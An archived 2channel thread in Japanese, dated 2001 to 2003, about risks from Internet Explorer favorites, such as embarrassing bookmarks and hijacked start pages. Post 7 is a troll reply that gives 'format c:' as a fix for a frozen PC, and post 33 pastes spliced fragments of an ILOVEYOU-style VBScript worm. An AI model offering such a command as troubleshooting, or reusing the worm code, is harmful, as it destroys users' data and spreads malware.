2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

@お気に入り登録して発生しうる問題!!

1 :名無しさん@お腹いっぱい。:01/10/31 13:52
 お気に入り登録して発生しうる問題を教えて下さい。

2 : :01/10/31 14:33
>>1
あ?

3 :名無しさん@お腹いっぱい。:01/10/31 15:15
>>1
ふつーねぇだろ・・・?

4 :名無しさん@お腹いっぱい。:01/10/31 17:40
エロサイト登録して知人や会社の同僚に見つかるとか(w

5 :(´ー`)y−~~~ :01/11/01 01:35
ttp://www.google.com/search?hl=ja&q=IE%81%40%82%A8%8BC%82%C9%93%FC%82%E8%81%40%96%E2%91%E8&lr=
>>1

6 :うーーん:01/11/01 22:09
デバッグ処理かなんかして
全然コンピューターがうごかなくなったけど
お気に入りのファイル見たとたん
ぎーぎーがーがーいって反応しなくなる
どうしたらよいのだろう?

7 :名無しさん@お腹いっぱい。:01/11/02 22:34
>>6
まずMS-DOSプロンプトを起動します。
そして
format c:
と入力します。フォーマットしますか?とメッセージがでてきたらYを押して
Enterキー。
これで大丈夫

8 :名無しさん@お腹いっぱい。:01/11/02 22:58
会社で使うパソコンのお気に入りに
[18禁] [もろ見え] [ロリータ] なんてタイトルのものをいれて、
人に見られたら大問題。IEが立ち上がってないからと油断すると、
フォルダのメニューバーや、Excelのツールバーから見られてしまう可能性もある。
自宅と会社で共用しているノートパソコンなどは特に注意。

9 :名無しさん@お腹いっぱい。:01/11/03 01:15

そうだ。親切だね。

10 :名無しさん@お腹いっぱい。:01/11/03 01:35
Active-Xオンにしたままエロめぐりしてると、そのうちJS何たらエクスプロイトに
スタートページ書き換えられてえらいことになる。。。

会社端末でこれやられて慌てた同僚。。
も、漏れぢゃない・・・・漏れは直してやったんだ!

11 :名無しさん@お腹いっぱい。:01/11/03 09:20
>10
Active-Xをオフにしていても、勝手にお気に入りに追加されたことのある記憶があるが、
オンにしていたのかな。

強引にスタートページを書き換えられたり、お気に入りに入れられても、嫌われたり警戒されるだけで相手にとって
メリットはないと思うんだが〜。

12 :うーーん:01/11/03 09:47
他にいい方法希望。

13 :名無しさん@お腹いっぱい。:01/11/03 10:14
>>11
エロ巡りはjavaも無効にしておいた方がいいよ
もしくは、おみとろん入れとくとか

>>12
>デバッグ処理かなんかして

>お気に入りのファイル見たとたん
IEで?それともマイコンかエクスプローラ?

14 :名無しさん@お腹いっぱい。:01/11/04 13:04
http://www.google.com/search?q=%82%A8%8BC%82%C9%93%FC%82%E8+%83A%83C%83R%83%93+%83v%83%89%83C%83o%83V%81%5B+%96%E2%91%E8

15 :名無しさん@お腹いっぱい。:02/02/09 08:17
もろみえどこ

16 :可愛い奥様:02/07/20 13:01
■■■■■■終了■■■■■

17 :名無しさん@お腹いっぱい。:02/11/18 08:06
javascript: なURLをお気に入りに登録させられると、ヤバいことが発生しうる。
例えば、……

やめとくよ。

18 :名無しさん@お腹いっぱい。:02/11/18 08:44
例えばこんな事例があるわけか。
http://www.google.co.jp/search?q=%EF%BD%87%EF%BD%92%EF%BD%95%EF%BD%85%EF%BC%8F%EF%BC%90%EF%BC%90%EF%BC%90%EF%BC%91&btnI=

19 :名無しさん@お腹いっぱい。:02/11/18 09:06
>>18はグロ あさからいやなもの見ちまった(つってもすっかりこういうのに
慣れたなぁ 2chって恐ろしいや

20 :名無しさん@お腹いっぱい。:02/11/18 09:28
お前らfaviconログを気にするか?


21 :名無しさん@お腹いっぱい。:02/11/18 09:50
>>17-20 日付を見ろ。

遠い過去に語りかけているので、
■■■■■■■■■■■■■■■ 終了 ■■■■■■■■■■■■■■■

22 :山崎渉:03/01/16 04:01
(^^)

23 :山崎渉:03/03/13 17:53
(^^)

24 :山崎渉:03/04/17 12:21
(^^)

25 :山崎渉:03/04/20 06:14
   ∧_∧
  (  ^^ )< ぬるぽ(^^)

26 :名無しさん@お腹いっぱい。:03/05/17 13:15
教えて下さい。

27 :山崎渉:03/05/22 02:03
━―━―━―━―━―━―━―━―━[JR山崎駅(^^)]━―━―━―━―━―━―━―━―━―

28 :名無しさん@お腹いっぱい。:03/05/28 11:29
カビの生えたようなスレなので これをどうぞ
http://www.hotwired.co.jp/news/news/technology/story/2322.html

29 :山崎渉:03/05/28 17:13
     ∧_∧
ピュ.ー (  ^^ ) <これからも僕を応援して下さいね(^^)。
  =〔~∪ ̄ ̄〕
  = ◎――◎                      山崎渉

30 :山崎 渉:03/07/15 11:15

 __∧_∧_
 |(  ^^ )| <寝るぽ(^^)
 |\⌒⌒⌒\
 \ |⌒⌒⌒~|         山崎渉
   ~ ̄ ̄ ̄ ̄

31 :ぼるじょあ ◆yBEncckFOU :03/08/02 05:12
     ∧_∧  ∧_∧
ピュ.ー (  ・3・) (  ^^ ) <これからも僕たちを応援して下さいね(^^)。
  =〔~∪ ̄ ̄ ̄∪ ̄ ̄〕
  = ◎――――――◎                      山崎渉&ぼるじょあ

32 :山崎 渉:03/08/15 23:09
    (⌒V⌒)
   │ ^ ^ │<これからも僕を応援して下さいね(^^)。
  ⊂|    |つ
   (_)(_)                      山崎パン

33 :名無しさん@お腹いっぱい。:03/10/18 16:26
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
cIf s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"),
E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))

7 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)